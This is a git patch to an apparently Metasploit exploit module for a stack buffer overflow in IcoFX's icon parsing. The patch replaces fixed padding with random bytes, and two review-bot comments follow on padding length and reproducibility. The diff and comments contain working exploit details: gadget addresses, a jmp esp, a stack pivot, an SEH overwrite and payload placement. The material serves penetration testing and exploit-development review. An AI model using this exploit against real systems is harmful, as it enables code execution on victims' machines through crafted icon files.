From b4439a263bb20ef6f2f66e7652389f8d65e47c30 Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Tue, 31 Dec 2013 16:06:25 -0600
Subject: [PATCH] Make things random
---
 modules/exploits/windows/fileformat/icofx_bof.rb | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)
diff --git a/modules/exploits/windows/fileformat/icofx_bof.rb b/modules/exploits/windows/fileformat/icofx_bof.rb
index d7aee68985..1def45cf42 100644
--- a/modules/exploits/windows/fileformat/icofx_bof.rb
+++ b/modules/exploits/windows/fileformat/icofx_bof.rb
@@ -72,13 +72,13 @@ class Metasploit3 < Msf::Exploit::Remote
 # ICONDIRENTRY structures 102 structures are using to overwrite
 # every structure = 16 bytes
 # 100 structures are used to reach the local variables
- ico << "A" * 652
+ ico << rand_text(652)
 ico << [0x0044729d].pack("V") * 20 # ret # rop nops are used to allow code execution with the different opening methods
 ico << [0x0045cc21].pack("V") # jmp esp
 ico << payload.encoded
- ico << "B" * (
+ ico << rand_text(
 1600 - # 1600 = 16 ICONDIRENTRY struct size * 100
- 652 - # padding
+ 652 - # padding to align the stack pivot
 80 - # rop nops size
 4 - # jmp esp pointer size
 payload.encoded.length
@@ -86,11 +86,11 @@ class Metasploit3 < Msf::Exploit::Remote
 # The next ICONDIRENTRY allows to overwrite the interesting local variables
 # on the stack
 ico << [2].pack("V") # Counter (remaining bytes) saved on the stack
- ico << "A" * 8 # Padding
+ ico << rand_text(8) # Padding
 ico << [0xfffffffe].pack("V") # Index to the dst buffer saved on the stack, allows to point to the SEH handler
 # The next ICONDIRENTRY allows to overwrite the seh handler
 ico << [0x00447296].pack("V") # Stackpivot: add esp, 0x800 # pop ebx # ret
- ico << "B" * (0xc) # padding
+ ico << rand_text(0xc) # padding
 return ico
 end
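Review bot: The length handed to the second rand_text call on the new side, `1600 - 652 - 80 - 4 - payload.encoded.length`, goes negative as soon as the encoded payload is longer than 864 bytes, and as far as I recall rand_text simply iterates `length.times` and returns an empty string for a negative count, whereas the old `"B" * (...)` raised ArgumentError — so an oversized payload now yields a quietly misaligned file (the counter/index ICONDIRENTRY no longer lands on the intended stack slots) instead of a failed run. The module's payload Space option, which is outside this hunk, may already cap the payload at 864 bytes; even so, computing the padding into a local and guarding it keeps the invariant visible, e.g. `pad = 1600 - 652 - 80 - 4 - payload.encoded.length` followed by `raise ArgumentError, 'payload too large for the ICONDIRENTRY padding' if pad < 0` (or the framework's fail_with equivalent) before `ico << rand_text(pad)`. Note also that the 652 random bytes now fill ICONDIRENTRY fields the parser reads (dwBytesInRes, dwImageOffset and friends) with arbitrary values where the old fill gave constant 0x41s; if the copy loop consults any of those fields this change trades reproducibility for randomness, which is worth a comment stating that the fields are ignored. The enclosing exploit method starts and ends outside this hunk.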
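Review bot: The `rand_text(8)` introduced between the counter and the index writes random bytes into stack slots that sit between two locals the exploit deliberately controls, and nothing in the hunk records that those slots are dead by the time the SEH handler is reached; with `"A" * 8` their contents were at least constant across runs, so a parser branch that happened to depend on them would fail reproducibly rather than intermittently. If the slots are known to be ignored, say so where the old comment only said "Padding": `# Padding: two stack slots between the counter and the index that the parser never consumes`; if that is not established, keep a fixed fill here and randomize only the 652-byte run in the earlier hunk. The trailing `rand_text(0xc)` after the stack-pivot address is less sensitive, since `add esp, 0x800` moves the stack past it, but the same one-line justification would help the next reader. The enclosing exploit method begins above this hunk; its closing `end` is the hunk's last line.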